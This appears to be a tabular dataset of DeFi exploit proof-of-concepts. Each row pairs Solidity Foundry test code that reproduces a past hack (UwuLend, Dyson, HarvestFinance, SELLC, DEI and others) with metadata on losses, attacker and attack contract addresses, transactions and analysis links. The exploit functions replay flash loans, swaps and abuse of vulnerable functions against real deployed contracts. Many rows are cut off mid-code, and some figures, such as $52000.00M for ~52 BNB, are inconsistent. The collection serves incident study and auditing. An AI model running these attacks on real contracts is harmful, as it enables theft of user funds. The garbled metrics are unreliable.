source_code stringlengths 878 31.2k | type stringclasses 1
value | protocol stringlengths 2 33 | date stringclasses 70
values | file_name stringlengths 10 41 | attack_vector stringclasses 4
values | content_hash stringlengths 16 16 | collected_at stringdate 2026-01-07 10:59:16 2026-01-07 10:59:16 | _source stringclasses 1
value | chain stringclasses 8
values | block_number int64 1.11M 356M ⌀ | total_lost_raw stringlengths 3 127 ⌀ | total_lost_usd float64 0 19,026B ⌀ | attacker_address stringlengths 65 82 ⌀ | attack_contract stringlengths 70 89 ⌀ | vulnerable_contract stringlengths 68 82 ⌀ | attack_tx stringlengths 89 115 ⌀ | postmortem_url stringclasses 85
values | twitter_url stringlengths 48 62 ⌀ | has_keyinfo bool 2
classes | has_analysis bool 2
classes | has_attack_vector bool 2
classes | severity stringclasses 4
values | severity_raw stringlengths 3 127 ⌀ | category stringclasses 5
values | exploit_code stringlengths 0 25.5k | has_exploit_code bool 2
classes | keyinfo_total_lost stringlengths 0 127 | keyinfo_attacker stringlengths 0 82 | keyinfo_attack_contract stringlengths 0 89 | keyinfo_vulnerable_contract stringlengths 0 82 | keyinfo_attack_tx stringlengths 0 115 | analysis_postmortem stringclasses 82
values | analysis_twitter stringlengths 0 62 | funds_lost_formatted stringlengths 2 13 | content_richness_score float64 0.63 10 | quality_estimate stringclasses 3
values | title stringlengths 20 51 | has_total_lost bool 2
classes | has_vulnerable_contract bool 2
classes | has_attack_tx bool 2
classes | has_postmortem bool 2
classes |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$19.3M
// TX : https://app.blocksec.com/explorer/tx/eth/0x242a0fb4fde9de0dc2fd42e8db743cbc197ffa2bf6a036ba0bba303df296408b
// Attacker : https://etherscan.io/address/0x... | exploit_poc | UwuLend_First | 2024-06 | UwuLend_First_exp.sol | flash_loan | ac53d8f1b74b02b2 | 2026-01-07T10:59:16.521268 | postmortems | ethereum | 20,061,318 | ~$19.3M | 19,300,000 | https://etherscan.io/address/0x841ddf093f5188989fa1524e7b893de64b421f47 | https://etherscan.io/address/0xf19d66e82ffe8e203b30df9e81359f8a201517ad | https://etherscan.io/address/0x2409af0251dcb89ee3dee572629291f9b087c668 | null | null | null | true | false | true | critical | ~$19.3M | flash-loan | function testExploit() public {
toBeLiquidatedHelper = new ToBeLiquidatedHelper();
vm.label(address(toBeLiquidatedHelper), "toBeLiquidatedHelper");
borrowHelper = new BorrowHelper();
vm.label(address(borrowHelper), "borrowHelper");
// 1. approve all
console.log("1. appro... | true | ~$19.3M | https://etherscan.io/address/0x841ddf093f5188989fa1524e7b893de64b421f47 | https://etherscan.io/address/0xf19d66e82ffe8e203b30df9e81359f8a201517ad | https://etherscan.io/address/0x2409af0251dcb89ee3dee572629291f9b087c668 | $19.30M | 9 | high | UwuLend_First Exploit (2024-06) | true | true | false | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~52 BNB
// TX : https://app.blocksec.com/explorer/tx/bsc/0xbac614f4d103939a9611ca35f4ec9451e1e98512d573c822fbff70fafdbbb5a0
// Attacker : https://bscscan.com/address/0x... | exploit_poc | Dyson_money | 2024-06 | Dyson_money_exp.sol | null | 431b0c2abeed79c8 | 2026-01-07T10:59:16.521419 | postmortems | bsc | 39,684,702 | ~52 BNB | 52,000,000,000 | https://bscscan.com/address/0x4ced363484dfebd0fab1b33c3eca0edca44a346c | https://bscscan.com/address/0x00db72390c1843de815ef635ee58ac19b54af4ef | null | null | null | null | true | false | false | critical | ~52 BNB | unknown | function testExploit() public {
USDT.approve(address(Router), type(uint256).max);
attack();
emit log_named_decimal_uint("[End] Attacker USDT balance after exploit", USDT.balanceOf(address(this)), 18);
emit log_named_decimal_uint("[End] Attacker USDC balance after exploit", USDC.balanceOf... | true | https://bscscan.com/address/0x4ced363484dfebd0fab1b33c3eca0edca44a346c | https://bscscan.com/address/0x00db72390c1843de815ef635ee58ac19b54af4ef | $52000.00M | 6.12 | medium | Dyson_money Exploit (2024-06) | true | false | false | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : $28K
// Attack Tx : https://app.blocksec.com/explorer/tx/bsc/0x397a09af6494c0bfcd89e010f5dd65d90f3ee1cf1ff813ce5b0c1d42a1c8dec9?line=84
// Attacker Address : https://bs... | exploit_poc | YYS | 2024-06 | YYS_exp.sol | null | 7f91965c78d77d7c | 2026-01-07T10:59:16.521484 | postmortems | bsc | 39,436,701 | $28K | 28,000 | null | null | null | https://app.blocksec.com/explorer/tx/bsc/0x397a09af6494c0bfcd89e010f5dd65d90f3ee1cf1ff813ce5b0c1d42a1c8dec9?line=84 | null | null | true | false | false | medium | $28K | unknown | function testExploit() public {
BUSDT.approve(address(invest), type(uint256).max);
// Step1: invest,Any address that has been bound before can be used.
address(invest).call(abi.encodeWithSelector(bytes4(0xb9b8c246), address(Anotheraddress), 100 ether));
// Step2: Start the attack.
... | true | $28K | https://app.blocksec.com/explorer/tx/bsc/0x397a09af6494c0bfcd89e010f5dd65d90f3ee1cf1ff813ce5b0c1d42a1c8dec9?line=84 | $28.0K | 6.55 | medium | YYS Exploit (2024-06) | true | false | true | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$3.7M
// TX : https://app.blocksec.com/explorer/tx/eth/0x9235e0662e230bdfa94f56f4932fd09a95fea17e4b9b44a4f40a59449e216110
// Attacker : https://etherscan.io/address/0x8... | exploit_poc | UwuLend_Second | 2024-06 | UwuLend_Second_exp.sol | flash_loan | bf906993bef3498d | 2026-01-07T10:59:16.521536 | postmortems | ethereum | 20,081,503 | ~$3.7M | 3,700,000 | https://etherscan.io/address/0x841ddf093f5188989fa1524e7b893de64b421f47 | https://etherscan.io/address/0x0935c185494cc9abee8890d01e67ddcc00b66f8c | https://etherscan.io/address/0x2409af0251dcb89ee3dee572629291f9b087c668 | null | null | null | true | false | true | critical | ~$3.7M | flash-loan | function testExploit() public {
vm.startPrank(attacker);
uSUSDE.transfer(address(this), 60_000_000 ether);
vm.stopPrank();
(
uint256 totalCollateral,
uint256 totalDebt,
uint256 availableBorrows,
uint256 currentLiquidationThreshold,
... | true | ~$3.7M | https://etherscan.io/address/0x841ddf093f5188989fa1524e7b893de64b421f47 | https://etherscan.io/address/0x0935c185494cc9abee8890d01e67ddcc00b66f8c | https://etherscan.io/address/0x2409af0251dcb89ee3dee572629291f9b087c668 | $3.70M | 9 | high | UwuLend_Second Exploit (2024-06) | true | true | false | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
contract ContractTest is Test {
CheatCodes cheat = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
// CONTRACTS
// Uniswap ETH/USDC LP (UNI-V2)
IUniswapV2Pair usdcPair = IUn... | exploit_poc | HarvestFinance | 2020-10 | HarvestFinance_exp.sol | flash_loan | 9a090685437a2537 | 2026-01-07T10:59:16.521591 | postmortems | unknown | 11,129,473 | null | null | null | null | null | null | null | null | false | false | true | medium | null | flash-loan | function testExploit() public {
usdt.approve(address(curveYSwap), type(uint256).max);
usdc.approve(address(curveYSwap), type(uint256).max);
usdc.approve(address(harvest), type(uint256).max);
usdt.approve(address(usdtPair), type(uint256).max);
usdc.approve(address(usdcPair), type(... | true | Unknown | 4.98 | low | HarvestFinance Exploit (2020-10) | false | false | false | false | |||||||
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/peckshield/status/1653149493133729794
// https://twitter.com/BlockSecTeam/status/1653267431127920641
// @TX
// https://bscscan.com/tx/0x6aef8bb501a53e290837d4398b34d5d... | exploit_poc | Level | 2023-05 | Level_exp.sol | flash_loan | ebd077ed948a3671 | 2026-01-07T10:59:16.521643 | postmortems | bsc | 27,830,139 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | false | Unknown | 4 | low | Level Exploit (2023-05) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~2.3 ETH
// Attacker : https://etherscan.io/address/0x4e998316ec31d2f3078f8f57b952bfae54728be1
// Attack Contract : https://etherscan.io/address/0x6943e74d1109a728f25a2... | exploit_poc | HODLCapital | 2023-05 | HODLCapital_exp.sol | flash_loan | 10d1d919e8e1dcc4 | 2026-01-07T10:59:16.521707 | postmortems | ethereum | null | ~2.3 ETH | 2.3 | https://etherscan.io/address/0x4e998316ec31d2f3078f8f57b952bfae54728be1 | https://etherscan.io/address/0x6943e74d1109a728f25a2e634ba3d74e9e476aed | null | null | null | null | true | true | true | low | ~2.3 ETH | flash-loan | function testExploit() public {
cheats.rollFork(17_220_892);
emit log_named_decimal_uint("Attacker ETH balance before exploit", weth.balanceOf(address(this)), 18);
// console.log("excludedFromFee:", hodl.isExcludedFromFee(excludedFromFeeAddress));
// console.log("excluded:", hodl.isExclu... | true | https://etherscan.io/address/0x4e998316ec31d2f3078f8f57b952bfae54728be1 | https://etherscan.io/address/0x6943e74d1109a728f25a2e634ba3d74e9e476aed | $2 | 8 | high | HODLCapital Exploit (2023-05) | true | false | false | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/Phalcon_xyz/status/1661424685320634368
// @TX
// https://explorer.phalcon.xyz/tx/bsc/0xb77cb34cd01204bdad930d8c172af12462eef58dea16199185b77147d6533391
// @Summ... | exploit_poc | GPT | 2023-05 | GPT_exp.sol | flash_loan | 3113b400e9c046aa | 2026-01-07T10:59:16.521774 | postmortems | unknown | 28,494,868 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | false | Unknown | 2.61 | low | GPT Exploit (2023-05) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~36K USD$
// Attacker : https://polygonscan.com/address/0x11576cb3d8d6328cf319e85b10e09a228e84a8de
// Attack Contract : https://polygonscan.com/address/0x43623b96936e854... | exploit_poc | LFI | 2023-05 | LFI_exp.sol | null | b8af0f0eb6022a94 | 2026-01-07T10:59:16.521823 | postmortems | polygon | 43,025,776 | ~36K USD$ | 36,000 | https://polygonscan.com/address/0x11576cb3d8d6328cf319e85b10e09a228e84a8de | https://polygonscan.com/address/0x43623b96936e854f8d85f893011f22ac91e58164 | https://polygonscan.com/address/0xfc604b6fd73a1bc60d31be111f798dd0d4137812 | https://polygonscan.com/tx/0xdd82fde0cc2fb7bdc078aead655f6d5e75a267a47c33fa92b658e3573b93ef0c | null | https://twitter.com/AnciliaInc/status/1660767088699666433 | true | true | false | medium | ~36K USD$ | unknown | false | ~36K USD$ | https://polygonscan.com/address/0x11576cb3d8d6328cf319e85b10e09a228e84a8de | https://polygonscan.com/address/0x43623b96936e854f8d85f893011f22ac91e58164 | https://polygonscan.com/address/0xfc604b6fd73a1bc60d31be111f798dd0d4137812 | https://polygonscan.com/tx/0xdd82fde0cc2fb7bdc078aead655f6d5e75a267a47c33fa92b658e3573b93ef0c | https://twitter.com/AnciliaInc/status/1660767088699666433 | $36.0K | 5.41 | medium | LFI Exploit (2023-05) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~95K US$
// Attacker : https://bscscan.com/address/0xc67af66b8a72d33dedd8179e1360631cf5169160
// Attack Contract : https://bscscan.com/address/0xf635fea87f0a8a444ede1dbb... | exploit_poc | SELLC | 2023-05 | SELLC_exp.sol | null | ac97f71aab53cef9 | 2026-01-07T10:59:16.521889 | postmortems | bsc | 28,092,673 | ~95K US$ | 95,000 | https://bscscan.com/address/0xc67af66b8a72d33dedd8179e1360631cf5169160 | https://bscscan.com/address/0xf635fea87f0a8a444ede1dbb698d875dbb417829 | https://bscscan.com/address/0x274b3e185c9c8f4ddef79cb9a8dc0d94f73a7675 | https://bscscan.com/tx/0x59ed06fd0d44aec351bed54f57eccec65874da5a25a0aa71e348611710ec05f3 | null | https://twitter.com/AnciliaInc/status/1656337400329834496 | true | true | false | medium | ~95K US$ | unknown | function testExploit() public {
deal(address(WBNB), address(this), 3 * 1e18);
deal(address(QIQI), address(this), 3188 * 1e18);
init();
init2();
process(23);
emit log_named_decimal_uint(
"Attacker WBNB balance after exploit", WBNB.balanceOf(address(this)), WBN... | true | ~95K US$ | https://bscscan.com/address/0xc67af66b8a72d33dedd8179e1360631cf5169160 | https://bscscan.com/address/0xf635fea87f0a8a444ede1dbb698d875dbb417829 | https://bscscan.com/address/0x274b3e185c9c8f4ddef79cb9a8dc0d94f73a7675 | https://bscscan.com/tx/0x59ed06fd0d44aec351bed54f57eccec65874da5a25a0aa71e348611710ec05f3 | https://twitter.com/AnciliaInc/status/1656337400329834496 | $95.0K | 9 | high | SELLC Exploit (2023-05) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~600 USD$
// Vulnerable contract address: https://bscscan.com/address/0xf3f1abae8bfeca054b330c379794a7bf84988228
// @Info
// Vulnerable contract code: https://bscscan.c... | exploit_poc | FAPEN | 2023-05 | FAPEN_exp.sol | null | d58c00b08523240c | 2026-01-07T10:59:16.521958 | postmortems | bsc | 28,637,846 | ~600 USD$ | 600 | null | null | null | null | null | null | true | true | false | low | ~600 USD$ | unknown | function testUnstake() public {
deal(address(this), 0);
emit log_named_decimal_uint("Amount of BNB before attack", address(this).balance, 18);
// Vulnerability lies in unstake function. Bad logic in balance check
FAPEN.unstake(FAPEN.balanceOf(address(FAPEN)));
FAPEN.approve(addre... | true | ~600 USD$ | $600 | 4.97 | low | FAPEN Exploit (2023-05) | true | false | false | false | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @TX's:
// 1. https://bscscan.com/tx/0x57b589f631f8ff20e2a89a649c4ec2e35be72eaecf155fdfde981c0fec2be5ba
// 2. https://bscscan.com/tx/0xbea605b238c85aabe5edc636219155d8c4879d6b05c48091cf1f7286bd4... | exploit_poc | LocalTrader2 | 2023-05 | LocalTrader2_exp.sol | access_control | e488b4a67434ff4c | 2026-01-07T10:59:16.522005 | postmortems | bsc | 28,460,897 | null | null | null | null | null | null | null | null | false | true | true | medium | null | access-control | function testAccess() public {
// 1.Changing owner address in vulnerable contract
emit log_named_decimal_uint(
"[1] Attacker amount of WBNB before attack", WBNB.balanceOf(address(this)), WBNB.decimals()
);
address addrInSlot0Before = getValFromSlot0();
emit log_named... | true | Unknown | 5.25 | medium | LocalTrader2 Exploit (2023-05) | false | false | false | false | |||||||
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/peckshield/status/1654667621139349505
// @TX
// https://bscscan.com/tx/0x3f1973fe56de5ecd59a815d3b14741cf48385903b0ccfe248f7f10c2765061f7
// @Summary
// critical funct... | exploit_poc | Melo | 2023-05 | Melo_exp.sol | access_control | d3d8ee6ed1984e9f | 2026-01-07T10:59:16.522056 | postmortems | bsc | 27,960,445 | null | null | null | null | null | null | null | null | false | true | true | medium | null | access-control | false | Unknown | 1.8 | low | Melo Exploit (2023-05) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~30K US$
// Attacker : https://bscscan.com/address/0x878a36edfb757e8640ff78b612f839b63adc2e51
// Attack Contract : https://bscscan.com/address/0x7b9265c6aa4b026b7220eee2... | exploit_poc | Bitpaidio | 2023-05 | Bitpaidio_exp.sol | null | 0fc3b47564f2a960 | 2026-01-07T10:59:16.522094 | postmortems | bsc | 28,176,675 | ~30K US$ | 30,000 | https://bscscan.com/address/0x878a36edfb757e8640ff78b612f839b63adc2e51 | https://bscscan.com/address/0x7b9265c6aa4b026b7220eee2e8697bf5ffa6bb9a | https://bscscan.com/address/0x9d6d817ea5d4a69ff4c4509bea8f9b2534cec108 | https://bscscan.com/tx/0x1ae499ccf292a2ee5e550702b81a4a7f65cd03af2c604e2d401d52786f459ba6 | null | https://twitter.com/BlockSecTeam/status/1657411284076478465 | true | true | false | medium | ~30K US$ | unknown | function testExploit() public {
firstLock();
cheats.warp(block.timestamp + 6 * 30 * 24 * 60 * 60 + 1000); // lock 6 month
Pair.swap(flashAmount, 0, address(this), new bytes(1));
emit log_named_decimal_uint("Attacker BTP balance after exploit", BTP.balanceOf(address(this)), BTP.decimal... | true | ~30K US$ | https://bscscan.com/address/0x878a36edfb757e8640ff78b612f839b63adc2e51 | https://bscscan.com/address/0x7b9265c6aa4b026b7220eee2e8697bf5ffa6bb9a | https://bscscan.com/address/0x9d6d817ea5d4a69ff4c4509bea8f9b2534cec108 | https://bscscan.com/tx/0x1ae499ccf292a2ee5e550702b81a4a7f65cd03af2c604e2d401d52786f459ba6 | https://twitter.com/BlockSecTeam/status/1657411284076478465 | $30.0K | 7.06 | medium | Bitpaidio Exploit (2023-05) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : unclear US$
// Attacker : https://bscscan.com/address/0xa3aa817587556c023e78b2285d381c68cee17069
// Attack Contract : https://bscscan.com/address/0x9a366027e6be5ae8441c9... | exploit_poc | SELLC02 | 2023-05 | SELLC02_exp.sol | null | fdf5ed37e8b3a877 | 2026-01-07T10:59:16.522152 | postmortems | bsc | 28,187,317 | unclear US$ | null | https://bscscan.com/address/0xa3aa817587556c023e78b2285d381c68cee17069 | https://bscscan.com/address/0x9a366027e6be5ae8441c9f54455e1d6c41f12e3c | https://bscscan.com/address/0xeaf83465025b4bf9020fdf9ea5fb6e71dc8a0779 | https://bscscan.com/tx/0xfe80df5d689137810df01e83b4bb51409f13c865e37b23059ecc6b3d32347136 | null | https://twitter.com/BlockSecTeam/status/1657715018908180480 | true | true | false | medium | unclear US$ | unknown | function testExploit() public {
deal(address(USDT), address(this), 1000 * 1e18);
stakeFactory(10);
cheats.warp(block.timestamp + 60 * 60);
TokenA = new TOKENA();
TokenA.mint(100);
Pair.flash(address(this), 10_000 * 1e18, 0, new bytes(1));
emit log_named_decimal... | true | unclear US$ | https://bscscan.com/address/0xa3aa817587556c023e78b2285d381c68cee17069 | https://bscscan.com/address/0x9a366027e6be5ae8441c9f54455e1d6c41f12e3c | https://bscscan.com/address/0xeaf83465025b4bf9020fdf9ea5fb6e71dc8a0779 | https://bscscan.com/tx/0xfe80df5d689137810df01e83b4bb51409f13c865e37b23059ecc6b3d32347136 | https://twitter.com/BlockSecTeam/status/1657715018908180480 | Unknown | 8 | high | SELLC02 Exploit (2023-05) | false | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~10 ETH
// Attacker : https://etherscan.io/address/0x8a4571c3a618e00d04287ca6385b6b020ce7a305
// Attack Contract : https://etherscan.io/address/0x52d74eb7c01c763219dce7... | exploit_poc | MultiChainCapital | 2023-05 | MultiChainCapital_exp.sol | flash_loan | 04a83bb5a888c596 | 2026-01-07T10:59:16.522212 | postmortems | ethereum | null | ~10 ETH | 10 | https://etherscan.io/address/0x8a4571c3a618e00d04287ca6385b6b020ce7a305 | https://etherscan.io/address/0x52d74eb7c01c763219dce713da97ebae8b91728e | null | null | null | null | true | true | true | low | ~10 ETH | flash-loan | function testExploit() public {
cheats.rollFork(17_221_445);
// emit log_named_decimal_uint("allowance", mcc.allowance(address(0x52d74eb7C01C763219DCE713dA97EBAE8B91728E), address(0x52d74eb7C01C763219DCE713dA97EBAE8B91728E)), mcc.decimals());
emit log_named_decimal_uint("Attacker ETH balance bef... | true | https://etherscan.io/address/0x8a4571c3a618e00d04287ca6385b6b020ce7a305 | https://etherscan.io/address/0x52d74eb7c01c763219dce713da97ebae8b91728e | $10 | 8 | high | MultiChainCapital Exploit (2023-05) | true | false | false | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~2K USD$
// Vulnerable Contract : https://etherscan.io/address/0x6feac5f3792065b21f85bc118d891b33e0673bd8
// @Info
// Vulnerable Contract Code : https://etherscan.io/ad... | exploit_poc | NOON | 2023-05 | NOON_exp.sol | null | 8384097df04871a8 | 2026-01-07T10:59:16.522282 | postmortems | ethereum | 17,366,979 | ~2K USD$ | 2,000 | null | null | https://etherscan.io/address/0x6feac5f3792065b21f85bc118d891b33e0673bd8 | null | null | null | true | true | false | low | ~2K USD$ | unknown | function testTransfer() public {
emit log_named_decimal_uint(
"Attacker amount of WETH before exploitation of vulnerability",
WETH.balanceOf(address(this)),
WETH.decimals()
);
// Vulnerable point. Looks like this function has wrong visibility. This shouldn't b... | true | ~2K USD$ | https://etherscan.io/address/0x6feac5f3792065b21f85bc118d891b33e0673bd8 | $2.0K | 6.36 | medium | NOON Exploit (2023-05) | true | true | false | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/BlockSecTeam/status/1661098394130198528
// https://twitter.com/numencyber/status/1661207123102167041
// @TX
// https://explorer.phalcon.xyz/tx/bsc/0x906394b2ee0... | exploit_poc | CS | 2023-05 | CS_exp.sol | null | d8a40ab393db2af8 | 2026-01-07T10:59:16.522328 | postmortems | unknown | 28,466,976 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | false | Unknown | 1.28 | low | CS Exploit (2023-05) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~50K US$
// Attacker : https://bscscan.com/address/0x4404de29913e0fd055190e680771a016777973e5
// Attack Contract : https://bscscan.com/address/0xa4fbc2c95ac4240277313bf3... | exploit_poc | LW | 2023-05 | LW_exp.sol | null | e33a01c81a251c64 | 2026-01-07T10:59:16.522374 | postmortems | bsc | 28,133,285 | ~50K US$ | 50,000 | https://bscscan.com/address/0x4404de29913e0fd055190e680771a016777973e5 | https://bscscan.com/address/0xa4fbc2c95ac4240277313bf3f810c54309dfcd6c | https://bscscan.com/address/0x7b8c378df8650373d82ceb1085a18fe34031784f | https://bscscan.com/tx/0xb846f3aeb9b3027fe138b23bbf41901c155bd6d4b24f08d6b83bd37a975e4e4a | null | https://twitter.com/PeckShieldAlert/status/1656850634312925184 | true | true | false | medium | ~50K US$ | unknown | function testExploit() public {
Pair.swap(1_000_000 * 1e18, 0, address(this), new bytes(1));
emit log_named_decimal_uint(
"Attacker USDT balance after exploit", USDT.balanceOf(address(this)), USDT.decimals()
);
} | true | ~50K US$ | https://bscscan.com/address/0x4404de29913e0fd055190e680771a016777973e5 | https://bscscan.com/address/0xa4fbc2c95ac4240277313bf3f810c54309dfcd6c | https://bscscan.com/address/0x7b8c378df8650373d82ceb1085a18fe34031784f | https://bscscan.com/tx/0xb846f3aeb9b3027fe138b23bbf41901c155bd6d4b24f08d6b83bd37a975e4e4a | https://twitter.com/PeckShieldAlert/status/1656850634312925184 | $50.0K | 7.82 | medium | LW Exploit (2023-05) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/BlockSecTeam/status/1657324561577435136
// @TX
// https://explorer.phalcon.xyz/tx/bsc/0x7d04e953dad4c880ad72b655a9f56bc5638bf4908213ee9e74360e56fa8d7c6a
// @Sum... | exploit_poc | SellToken | 2023-05 | SellToken_exp.sol | flash_loan | 1e9b4f0bb03280c0 | 2026-01-07T10:59:16.522419 | postmortems | unknown | 28,168,034 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | false | Unknown | 3.28 | low | SellToken Exploit (2023-05) | false | false | false | false | ||||||||
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
/*
@Analysis
https://twitter.com/BeosinAlert/status/1653619782317662211
@TX
https://bscscan.com/tx/0xccf513fa8a8ed762487a0dcfa54aa65c74285de1bc517bd68dbafa2813e4b7cb*/
interface INeverFall {
functio... | exploit_poc | NeverFall | 2023-05 | NeverFall_exp.sol | flash_loan | 333661ea0e2825e2 | 2026-01-07T10:59:16.522465 | postmortems | bsc | 27,863,178 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public {
uint256 flashLoanAmount = 1_600_000 * 1e18;
IUniswapV2Pair(busd_usdt_pool).swap(flashLoanAmount, 0, address(this), new bytes(1));
} | true | Unknown | 4.17 | low | NeverFall Exploit (2023-05) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/numencyber/status/1661213691893944320
// @TX
// https://explorer.phalcon.xyz/tx/bsc/0x57b589f631f8ff20e2a89a649c4ec2e35be72eaecf155fdfde981c0fec2be5ba
// https:... | exploit_poc | LocalTrader | 2023-05 | LocalTrader_exp.sol | access_control | 0dd482f0ce935a37 | 2026-01-07T10:59:16.522510 | postmortems | unknown | 28,460,897 | null | null | null | null | null | null | null | null | false | true | true | medium | null | access-control | false | Unknown | 2.6 | low | LocalTrader Exploit (2023-05) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/Phalcon_xyz/status/1656176776425644032
// @TX
// https://explorer.phalcon.xyz/tx/bsc/0xace112925935335d0d7460a2470a612494f910467e263c7ff477221deee90a2c
// https... | exploit_poc | SNK | 2023-05 | SNK_exp.sol | null | a0b7a8bb7236ae2a | 2026-01-07T10:59:16.522574 | postmortems | unknown | 27,784,455 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | false | Unknown | 3 | low | SNK Exploit (2023-05) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/cryptofishx/status/1662888991446941697
// https://docs.jimbosprotocol.xyz/protocol/liquidity-rebalancing-scenarios
// https://twitter.com/yicunhui2/status/16637... | exploit_poc | Jimbo | 2023-05 | Jimbo_exp.sol | flash_loan | f5f8a39f08adf8bc | 2026-01-07T10:59:16.522641 | postmortems | arbitrum | 95,144,404 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | false | Unknown | 4 | low | Jimbo Exploit (2023-05) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : 200 land NFT => 28,601 $XQJ => 149,616 $BUSD
// Attack Tx : https://bscscan.com/tx/0xe4db1550e3aa78a05e93bfd8fbe21b6eba5cce50dc06688949ab479ebed18048
// @Analysis
// ht... | exploit_poc | landNFT | 2023-05 | landNFT_exp.sol | null | e49f13074a87a050 | 2026-01-07T10:59:16.522718 | postmortems | bsc | 28,208,132 | 200 land NFT => 28,601 $XQJ => 149,616 $BUSD | 200 | null | null | null | https://bscscan.com/tx/0xe4db1550e3aa78a05e93bfd8fbe21b6eba5cce50dc06688949ab479ebed18048 | null | null | true | true | false | low | 200 land NFT => 28,601 $XQJ => 149,616 $BUSD | unknown | function testExploit() public {
emit log_named_uint("Attacker amount of NFT land before mint", landNFT.balanceOf(address(this)));
address[] memory to = new address[](1);
to[0] = address(this);
uint256[] memory amount = new uint256[](1);
amount[0] = 200;
minerContract.min... | true | 200 land NFT => 28,601 $XQJ => 149,616 $BUSD | https://bscscan.com/tx/0xe4db1550e3aa78a05e93bfd8fbe21b6eba5cce50dc06688949ab479ebed18048 | $200 | 5.86 | medium | landNFT Exploit (2023-05) | true | false | true | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/eugenioclrc/status/1654576296507088906
// @TX
// https://arbiscan.io/tx/0xb1141785b7b94eb37c39c37f0272744c6e79ca1517529fec3f4af59d4c3c37ef
interface IStablePai... | exploit_poc | DEI | 2023-05 | DEI_exp.sol | null | 458b14aee28bc5e5 | 2026-01-07T10:59:16.522758 | postmortems | arbitrum | 87,626,024 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | function testExploit() public {
console.log("DEI balance: ", DEI.balanceOf(address(this)));
DEI.approve(address(pair), type(uint256).max);
DEI.burnFrom(address(pair), 0);
DEI.transferFrom(address(pair), address(this), DEI.balanceOf(address(pair)) - 1);
